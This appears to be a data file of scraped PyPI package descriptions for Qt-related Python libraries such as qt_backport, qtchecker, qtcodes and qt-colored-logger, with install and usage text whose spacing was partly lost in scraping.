'welcome user' and user thumbnail\"\"\"def__init__(self,parent=None,user=None):super(UserPopup,self).__init__(parent=parent)layout=QtWidgets.QHBoxLayout(self)thumbnail=ThumbnailBase()thumbnail.setFixedWidth(75)thumbnail.setFixedHeight(75)thumbnail.setToolTip(user[\"first_name\"])welcome=QtWidgets.QLabel(\"Welcome!\")layout.addWidget(thumbnail)layout.addWidget(welcome)self.thumbnail=thumbnailself.welcome=welcomeself._user=Noneifuser:self.set_user(user)defset_user(self,user):self._user=user# Load user thumbnailself.thumbnail.load(\"pictures/thumbnails/persons/{0}.png\".format(user[\"id\"]))# Set welcome messageself.welcome.setText(\"Welcome{first_name}{last_name}!\".format(**user))# Show pop-up about current useruser=gazu.client.get_current_user()popup=UserPopup(user=user)popup.show()"} +{"package": "qt_backport", "pacakge-description": "qt_backportqt_backportmakes unmodified python code based on Qt4 work with Qt5.More specifically (and currently), if you have PyQt5 installed and\nfunctional, but want to work with older PyQt4 or 
PySide code without having\nto do any conversion work, this package is for you!InstallationUninstall any existing Qt4 wrapper (PyQt4 or PySide) if you have one.Install PyQt5pip install qt_backportUsageqt_backportautomatically makes both \u2018PyQt4\u2019 and \u2018PySide\u2019 packages\navailable that will function like the old Qt4 versions, but will actually be\nbacked by PyQt5.ie: your old code like this will just work as-is:import PyQt4\nfrom PyQt4 import QtCore\nfrom PyQt4.QtGui import * #<-- this is supported, but yuckorimport PySide\nfrom PySide import QtCore\nfrom PySide.QtGui import * #<-- this is supported, but yuckWhen to useqt_backport?This package is particularly useful when you have installed a modern Qt5\nwrapper (currently only PyQt5) and are trying to learn Qt using legacy code\nexamples you find on the web.qt_backportis not primarily intended as a method for porting your\napplications from Qt4 to Qt5 (you are better off converting if you can), but\nit does do a good job of this and can definitely help get you started.Why isqt_backportneeded at all?When Qt4 was updated to Qt5 there was amajorreorganization done to the\nclass organization. In addition, there have been many other API changes.One of the most significant changes was that a huge number of classes that\nused to be contained within \u2018QtGui\u2019 were dispersed out to various other\nlocations instead. eg:Allof the widgets were moved out of QtGui and into\na new module called QtWidgets. Although the new locations make much more\nsense, it broke a lot of old code.qt_backportis a hack to make old\ncode work as-is.There have been many more API changes in the Qt 4.x to Qt 5.2 transition (Qt\n5.2 is current the time of writing this).qt_backportdeals with many of\nthese changes, but all of them may not be captured (yet). A simple example of\nsuch a change (thatqt_backporthandles) is that QColor.dark() was\nremoved and replaced with QColor.darker() in Qt 4.3.Note that, although the backport generally works quite well, there may be\nadditional changes you need to make to to your old code for it to work. These\nchanges depend on the vintage of your old code. For example, old style\nsignal/slot connections are not currently supported.NOTE: At the current time, the only Qt wrapper for python that works with Qt5\nis PyQt5. In future this may change (eg: when PySide upgrades to use Qt5).How does it work?qt_backportwraps Qt using PyQt5 (currently the only python wrapper for\nQt5), but provides an emulation layer that emulates both the PySide and the\nPyQt4 APIs. 
Installingqt_backportautomatically makes the PySide and\nPyQt4 emulators available for import.This is easier to see visually:+-----------------------------------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009Existing\u2009Python\u2009code\u2009that\u2009expects\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009the\u2009PyQt4\u2009or\u2009PySide\u2009API\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+-------+------------------+--------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009OLD\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009WAY\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\nqt_backport\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009PySide\u2009or\u2009\u2009|\nEmulation\u2009layer:\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009PyQt4\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u20
09\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+--------+--------+\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\nWrapper\u2009layer:\u2009\u2009\u2009\u2009|\u2009PySide\u2009or\u2009PyQt4\u2009|\u2009\u2009\u2009|\u2009\u2009\u2009PyQt5\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+--------+--------+\u2009\u2009\u2009+-----+-------+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+----+-----+\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+---+-----+\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\nQt\u2009library\u2009layer:\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009Qt4\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009Qt5\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009|\n\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+----------+\u2009\u2009\u2009\u2009\u2009\u2009\u2009\u2009+---------+To do:support old-style connections (ie:connect(app,SIGNAL(),app, SLOT())support more known api changesAPI change coverage is currently not 100%, being mostly driven by demand for certain classes/methods. Coverage is currently quite good, though.other potential changes are covered here:http://qt-project.org/doc/qt-5/portingguide.htmlunit tests for the zillion api patchesLicenseMIT. 
See LICENSE file."} +{"package": "qt-binder", "pacakge-description": "QtBinder provides a way to bind Qt widgets to Traits models."} +{"package": "qtbot", "pacakge-description": "UNKNOWN"} +{"package": "qtbox", "pacakge-description": "Qt Box (\u4e2d\u6587)Qt Box contains many common and useful PyQt & PySide widget demos, which may save your time during development.Installationpip install qtboxHow to useOpen a command window and use commandqtboxto show Qt Box GUI.Right-click on a widget shown in the Style tab or Function tab, then you can view or download the code.When viewing the code, you can click on the switch button to show PyQt, PySide or C++/Qt code.On the main window, click on the switch button to change the window theme.Click on the edit button or typeqtbox-qssin the command window to open QSS Editor.For C++ Qt usersIf you don't have a Python environment, downloadQtBox.zipwhich includesqtbox.exeexecutable file.Support authorSupport author to make this project better. Thanks a lot. :)PayPalWeChat or AliPayOther linksGithubCSDNBilibili\u77e5\u4e4ePyPi"} +{"package": "qtb-plot", "pacakge-description": "QTB PlotThis package is basically just a convenience matplotlib option setter.\nYou have two ways of using it.\nWithset_styleyou set the style for the entire notebook or whatever session\nyou are working in and withplotting_contextyou create a context manager\nthat will only set the style locally for the current plot.Take a look at the supplied tutorial notebok to see how this is done.The easiest way of installing the package is to cd into the package folder and to install it locally withpip install -e ."} +{"package": "qtbricks", "pacakge-description": "qtbricksPython Qt components: widgets and utils, focussing on scientific GUIs.Welcome! This is qtbricks, a Python package collecting a growing series of \u201creal-world\u201dGUI widgetsand related tools written with and forPySide6, the official Python bindings for Qt6.Do you want or need to create complex GUIs with Python and Qt but don\u2019t want to spend too much time reimplementing seemingly basic widgets and functionality? Are you overwhelmed by the complexity of GUI programming and just want to focus on the actual tasks that need to get done? So do we, and that\u2019s how qtbricks was born.Separate the GUI from the business logicin your code, provide a series of high-level GUI widgets for (admittedly complex) standard tasks,focus on as readable and as Pythonic code as possible. And yes, it has a clear focus onGUIs for scientific data analysistasks.FeaturesA list of features:Highly modular code: each widget is as self-contained as possibleUser-friendly: obvious behaviour, no surprises, hints (via tooltips) includedSeparation of concerns: widgets handle the GUI stuff and expose a programmatic APIDesigned with code readability in mindAnd to make it even more convenient for users and future-proof:Open source project written in Python (>= 3.7)Developed fully test-driven (well, not yet\u2026)Extensive user and API documentationInstallationTo install the qtbricks package on your computer (sensibly within a Python virtual environment), open a terminal (activate your virtual environment), and type in the following:pip install qtbricksLicenseThis program is free software: you can redistribute it and/or modify it under the terms of theBSD License.A note on the nameWhy \u201cqtbricks\u201d? What is in a name? A name should answer the important questions (What is it? 
What does it?), should be easy to remember and reasonably unique to be searchable (findable!) on the web. Bricks are basic building blocks, more generic than the term \u201cwidget\u201d in a GUI context, and after all, bricks seem to have a natural connection to windows, haven\u2019t they?"} +{"package": "qt-brohub", "pacakge-description": "qt-brohubPython Broker API client, not your typical bro, but definitely the one you need for trading.Installation$python-mpipinstallqt-brohub"} +{"package": "qtc", "pacakge-description": "No description available on PyPI."} +{"package": "qtcd", "pacakge-description": "An ECDSA and XMSS interchangeable, decentralized P2P, mining-resistant, fully anonymized, self-regulating and backward stochastic python implementation of the bitcoin protocol"} +{"package": "qtchecker", "pacakge-description": "Authors: Jan Kota\u0144ski IntroductionThis is a simple helper module to perform PyQt GUI tests.Source code:https://github.com/jkotan/qtcheckerProject Web page:https://jkotan.github.io/qtcheckerWith theqtcheckermodule its usercreatesQtCheckerobject with the global QApplication object and a given tested QWidget dialog parametersdefines a sequence of checks withsetChecks()method and the following helper classes:AttrCheck- read a tested dialog attribute valueCmdCheck- execute a tested dialog command and read its result valueWrapAttrCheck- execute a wrapper command on a tested dialog attributeWrapCmdCheck- execute a wrapper command on a result value of a tested dialog commandExtAttrCheck- read an external attribute value defined outside the dialogExtCmdCheck- execute an external command defined outside the dialog and read its result valuestarts event loop and performs checkes withexecuteChecks()orexecuteChecksAndClose()methodcompare results by readingresultsattribute of executingfor exampleimportunittestfromPyQt5importQtGuifromPyQt5importQtCorefromPyQt5importQtTestfromqtchecker.qtCheckerimportQtChecker,CmdCheck,WrapAttrCheck,ExtCmdCheck# import my dialog modulefromlavuelibimportliveViewer# QApplication object should be one for all tessapp=QtGui.QApplication([])classGuiTest(unittest.TestCase):def__init__(self,methodName):unittest.TestCase.__init__(self,methodName)deftest_run(self):# my tested MainWindow dialogdialog=liveViewer.MainWindow()dialog.show()# create QtChecker objectqtck=QtChecker(app,dialog)# define a sequence of action of the dialogqtck.setChecks([# read return value of execute isConnected commandCmdCheck(# a python path to a method executed in the first action\"_MainWindow__lavue._LiveViewer__sourcewg.isConnected\"),# click pushButton with the left-mouse-clickWrapAttrCheck(# a python path to an pushButton object\"_MainWindow__lavue._LiveViewer__sourcewg._SourceTabWidget__sourcetabs[],0._ui.pushButton\",# Wrapper command to be executed on the action objectQtTest.QTest.mouseClick,# additional parameters of the wrapper command[QtCore.Qt.LeftButton]),# read a result of external \"getLAvueState\" commandExtCmdCheck(# parent object of the external commandself,# external command name\"getLavueState\"),])# execute the check actions and close the dialogstatus=qtck.executeChecksAndClose()self.assertEqual(status,0)# compare results returned by each actionqtck.compareResults(self,[# a result of isConnected() commandTrue,# a result of the mouseClick on the pushButtonNone,# a result of getLavueState() command'{\"connected\": false}'])defgetLavueState(self):\"\"\" an external command \"\"\"importtangoreturntango.DeviceProxy(\"po/lavuecontroller/1\").LavueStateMore examples 
can be found at likeLavueTestsorLavueStateTests.InstallationQtChecker requires the following python packages:qt4orqt5orpyqtgraph.From sourcesDownload the latest QtChecker version fromhttps://github.com/jkotan/qtcheckerExtract sources and run$pythonsetup.pyinstallThesetup.pyscript may need:setuptools sphinxpython packages as well asqtbase5-dev-toolsorlibqt4-dev-bin.Debian packagesDebianbusterandstretchor Ubuntufocal,eoan,bionicpackages can be found in the HDRI repository.To install the debian packages, add the PGP repository key$sudosu$wget-q-O-http://repos.pni-hdri.de/debian_repo.pub.gpg|apt-keyadd-and then download the corresponding source list, e.g.$cd/etc/apt/sources.list.dand$wgethttp://repos.pni-hdri.de/buster-pni-hdri.listor$wgethttp://repos.pni-hdri.de/stretch-pni-hdri.listor$wgethttp://repos.pni-hdri.de/focal-pni-hdri.listrespectively.Finally,$apt-getupdate$apt-getinstallpython-qtchecker$apt-getupdate$apt-getinstallpython3-qtcheckerfor python 3 version.From pipTo install it from pip you need to install pyqt5 in advance, e.g.$python3-mvenvmyvenv$.myvenv/bin/activate$pipinstallpyqt5$pipinstallqtchecker"} +{"package": "qtciutil", "pacakge-description": "qt-ci-utilSome basic python methods for building CI for qt projects.Usagepip install qtciutilScript example:importqtciutil# Get Qt Versionqt_version_str=qtciutil.qt_version()# Build Qt Projectqtciutil.build('/home/l2m2/workspace/xxx/src/xxx.pro','/home/l2m2/workspace/xxx/build','debug')# Unit Testqtciutil.unit_test('/home/l2m2/workspace/xxx/test/test.pro','/home/l2m2/workspace/xxx/build','/home/l2m2/workspace/xxx/dist')LicenseMITPublish to PyPIpip install --user --upgrade setuptools wheel twine\npython setup.py sdist bdist_wheel\npython -m twine upload dist/*Referencehttps://juejin.im/post/5d8814adf265da03be491737"} +{"package": "qtcodes", "pacakge-description": "qtcodesQiskit Topological CodesInstallationConda users, please make sure toconda install pipbefore running any pip installation if you want to installqtcodesinto your conda environment.qtcodesis published on PyPI. So, to install, simply run:pipinstallqtcodesIf you also want to download the dependencies needed to run optional tutorials, please usepip install qtcodes[dev]orpip install 'qtcodes[dev]'(forzshusers).To check if the installation was successful, run:>>>importqtcodesasqtcBuilding from sourceTo buildqtcodesfrom source, pip install using:gitclonehttps://github.com/yaleqc/qtcodes.gitcdqtcodes\npipinstall--upgrade.If you also want to download the dependencies needed to run optional tutorials, please usepip install --upgrade .[dev]orpip install --upgrade '.[dev]'(forzshusers).Installation for DevsIf you intend to contribute to this project, please installqtcodesin editable mode as follows:gitclonehttps://github.com/yaleqc/qtcodes.gitcdqtcodes\npipinstall-e.[dev]Please usepip install -e '.[dev]'if you are azshuser.Building documentation locallySet yourself up to use the[dev]dependencies. Then, from the command line run:mkdocsbuildMotivationQuantum computation is an inherently noisy process. Scalable quantum computers will require fault-tolerance to implement useful computation. There are many proposed approaches to this, but one promising candidate is the family oftopological quantum error correcting codes.Currently, theqiskit.ignis.verification.topological_codesmodule provides a general framework for QEC and implements one specific example, therepetition code. 
Qiskit Topological Codes builds out theqtcodesmodule into a diverse family of QEC encoders and decoders, supporting the repetition code, XXXX/ZZZZ (XXZZ) rotated surface code, and the XZZX rotated surface code.Inspired by theQiskit Textbook, we've written a full set ofjupyter notebook tutorialsto demonstrate thecircuit encoders,graph decoders, andbenchmarking toolsthat compose Qiskit Topological Codes. These tutorials both demonstrate the elegance of QEC codes as well as the utility of this package -- please check them out!CodebaseFig 1.Rotated XXXX/ZZZZ (XXZZ) Surface Code. ZZZZ/ZZ syndromes in red, XXXX/XX syndromes in purple, physical errors in green, and syndrome hits in yellow.Topological QEC codes disperse, and thus protect, one quantum bit of logical information across many physical qubits. The classical repetition code distributes 1 bit of logical information across multiple imperfect physical bits (e.g. logical 0 is 000...0 and logical 1 is 111...1). In the classical repetition logical 0 bit, for example, a few physical bits may flip to 1, but the majority will very likely stay in 0, thus preserving the logical 0 bit. Similarly, the surface code protects one logical qubit in a grid of imperfect physical qubits against Pauli errors.Theqtcodesmodule can be broken down intocircuits(encoders) andfitters(decoders). Additionally, unittests can be found intestsand benchmarking tools inqtcodes/tools.The rotated surface code is based on the earlier theoretical idea of atoric code, with periodic boundary conditions instead of open boundary conditions. This has been shown to be largely identical, but embedding a surface code on an actual device is much easier.CircuitsTheqtcodes.circuitssub-module contains classes such asXXZZQubit,XZZXQubit, andRepetitionQubit, which each allow users to construct and manipulate circuits encoding one logical qubit using a particular QEC code.For example, we can create and apply a logical X onto aRepetitionQubitas followsfromqtcodesimportRepetitionQubitqubit=RepetitionQubit({\"d\":3},\"t\")qubit.reset_z()qubit.stabilize()qubit.x()qubit.stabilize()qubit.readout_z()qubit.draw(output='mpl',fold=150)qtcodes.circuits.circalso allows users to createTopologicalRegisters (treg: a collection of topological qubits) andTopologicalCircuits (tcirc: a circuit built using a treg), the analog ofQuantumRegisterandQuantumCircuit.We can, for example, create a tcirc and treg out of twoRepetitionQubits.fromqtcodesimportTopologicalRegister,TopologicalCircuittreg=TopologicalRegister(ctypes=[REPETITION,REPETITION],params=[{\"d\":3},{\"d\":3}])circ=TopologicalCircuit(treg)circ.x(treg[0])circ.stabilize(treg[1])circ.x(1)circ.draw(output='mpl',fold=500)Learn more about circuits through encoder tutorials such as thisonefor the XXXX/ZZZZ rotated surface code.FittersTopological codes aim to build better (read: less noisy) logical qubits out of many imperfect physical qubits. 
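As an aside (plain Python, not part of the qtcodes API), the classical repetition-code intuition described above can be sketched in a few lines: spread one logical bit over several noisy physical bits and recover it by majority vote.

import random

def encode(bit, n=5):
    # Repetition encoding: one logical bit becomes n identical physical bits.
    return [bit] * n

def add_noise(bits, p=0.1):
    # Independently flip each physical bit with probability p.
    return [b ^ (random.random() < p) for b in bits]

def decode(bits):
    # Majority vote recovers the logical bit while fewer than half have flipped.
    return int(sum(bits) > len(bits) / 2)

noisy = add_noise(encode(0))
print(noisy, "->", decode(noisy))  # almost always recovers 0

The surface codes implemented by qtcodes pursue the same goal for qubits, except that errors must be inferred indirectly from stabilizer (syndrome) measurements rather than read off the data qubits directly.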
This improvement is enabled by decoding schemes that can detect and thus correct for errors on a code's constituent physical qubits.The Qiskit Topological Codes package leverages Minimum-Weight Perfect Matching Graph Decoding to efficiently correct logical qubit readout.For example, we can decode the syndrome hits in Fig 1 and fine the most probable error chains (data qubit flips) corresponding to these syndrome hits.#d: surface code side length, T: number of roundsdecoder=RotatedDecoder({\"d\":5,\"T\":1})all_syndromes={\"X\":[(0,1.5,.5),(0,.5,1.5)],\"Z\":[(0,0.5,0.5),(0,1.5,1.5),(0,1.5,3.5),(0,3.5,3.5)]}matches={}forsyndrome_key,syndromesinall_syndromes.items():print(f\"{syndrome_key}Syndrome Graph\")error_graph=decoder._make_error_graph(syndromes,syndrome_key)print(\"Error Graph\")decoder.draw(error_graph)matches[syndrome_key]=decoder._run_mwpm(error_graph)matched_graph=decoder._run_mwpm_graph(error_graph)print(\"Matched Graph\")decoder.draw(matched_graph)print(f\"Matches:{matches[syndrome_key]}\")print(\"\\n===\\n\")In this way, Qiskit Topological Codes uses graph decoding to find and correct for the most probable set of errors (error chains).The careful reader will notice that connecting syndrome hits in the most probable set of \"error chains\" does not uniquely specify the underlying physical qubits that underwent physical errors (i.e. there are multiple shortest paths between two syndrome hits). It turns out, by the nuances of how topological codes store logical information (i.e. codespace), in most cases the exact path across physical qubits doesn't matter when correcting for an error chain. Read more about this in thistutorialon Decoding for XXZZ Qubits!BenchmarkingFinally, the efficiency and efficacy of the Qiskit Topological Codes package is demonstrated through benchmark simulations achieving threshold for the Repetition, XXZZ, and XZZX topological codes. Here, threshold is defined as the maximum physical error rate (i.e. imperfection level of physical qubits) below which larger surface codes perform better than smaller surface codes.Fig. 2By simulating circuits with errors inserted between two rounds of stabilizing measurements, we are able to extract a logical error rate for each code for a given physical error rate (quality of physical qubit) and surface code size. In particular, threshold is shown for the repetition code (left), XXZZ code (center), and XZZX code (right).Explore the benchmarkingtoolsandsimulationsto see how the graphs in Fig. 
2 were created.Future DirectionsCheckoutissuesto see what we are working on these days!AcknowledgementsCore Devs:Shantanu Jha,Amir Ebrahimi,Jeffrey GongThanks to our mentorJames Wootton(IBM) for invaluable feedback and support since the inception of this project at the IBM Qiskit - Summer Jam Hackathon 2020.Thanks also toMatthew Treinishfrom theretworkxteam for helping onboard and support this project.Alums:Henry Liu,Shraddha Singh,Will Sun,Andy Ding,Jessie Chen,Aaron Householder,Allen MiReferencesHere's some reading material that we found particularly useful:Presentationslidesandvideoabout this package to the Qiskit Advocate community at the November 2020 Qiskit Advocate Demo Session.Surface Codes: Towards Practical Large-Scale Quantum ComputationStabilizer Codes and Quantum Error CorrectionMulti-path Summation for Decoding 2D Topological CodesQiskit Textbook - Introduction to Quantum Error Correction using Repetition Codes"} +{"package": "qt-collapsible-section-pyside6", "pacakge-description": "No description available on PyPI."} +{"package": "qt-colored-logger", "pacakge-description": "!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!Qt_\u0421olored-loggerContentQt_\u0421olored-loggerContentPreambleOverviewImportant releasesLICENSEInstallationUsageAdditional functionalityDataTroubleshootingAuthorsPreambleI often came across the opinion that it is better to use not standard output to the console, but full-fledged logging... However, the standard libraries do not provide exactly what I need... Therefore, I decided to make my own library! Which will implement the functionality I need.I was inspired by thecolored-logslibrary.ContentOverviewThe library implements the formation of a beautifully formatted colored text, similar to a log, which has all the necessary information:Device name and registered profile, system name, etc. (this data is displayed only once at the beginning of the logging)Log entry timeLog entry statusDescription of the log entry statusLog entry typeEntry messageAny information to the output can be turned off (according to the default, everything is included). It is also possible to change the output settings during the logging process. It is possible to change the colors of the foreground text and the background.ContentImportant releasesSee the important releases (possible spoilers)v0.1.0 - First official release (complete basic HTML logger)v0.2.0 - Structural update (added basic console logger with HTML base)v0.3.0 - Background update (added background for log entries)v0.4.0 - Buffer update (added text buffer)v0.5.0 - PROJECT NAME CHANGED!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!ContentLICENSEThe full text of the license can be found at the followinglink.Copyright \u00a9 2023 Kalynovsky Valentin. 
All rights reserved.Licensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions andContentInstallationDespite the fact that the library was originally developed for use in PyQt, it does not require PyQt to be installed, since this framework for outputting to Text fields, which support not only Plain Text, uses HTML and this library simply simplifies the logging process, since the creation process already formatted strings is registered in this library.!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!To install the library, enter the command:pipinstallqt-colored-loggerUsageThis is the simplest example of using the library:fromqt_colored_logger.textimportTextBufferfromqt_colored_logger.loggerimportLoggerif__name__==\"__main__\":buf=TextBuffer(115)logger=Logger(program_name=\"Test\",text_buffer=buf)logger.MESSAGE(status_message_text=\"OK\",message_text=\"Outputting the message\")The outputs in console will contain the following text (GitHub, PyPi and possibly some other sites do not support displaying colors in Markdown - use resources that support them, such as PyCharm):-Test?entry> $\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588^\u2588\u2588\u2588\u2588@\u2588\u2588\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588:\u2588\u2588\u2588\u2588\u2588-?entry>*2023-04-09 12:37:07.198496#STATUS:OK@MESSAGE -Outputting the messageSee the USAGING.md file for more details.ContentAdditional functionality!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. This repositoryis no longer maintained by the author!ContentDataSee the DATA.md file.ContentTroubleshooting!!!ATTENTION!!! In connection with the increase in capabilities and functionality, the library has changed its name! It is now calledMighty Logger. 
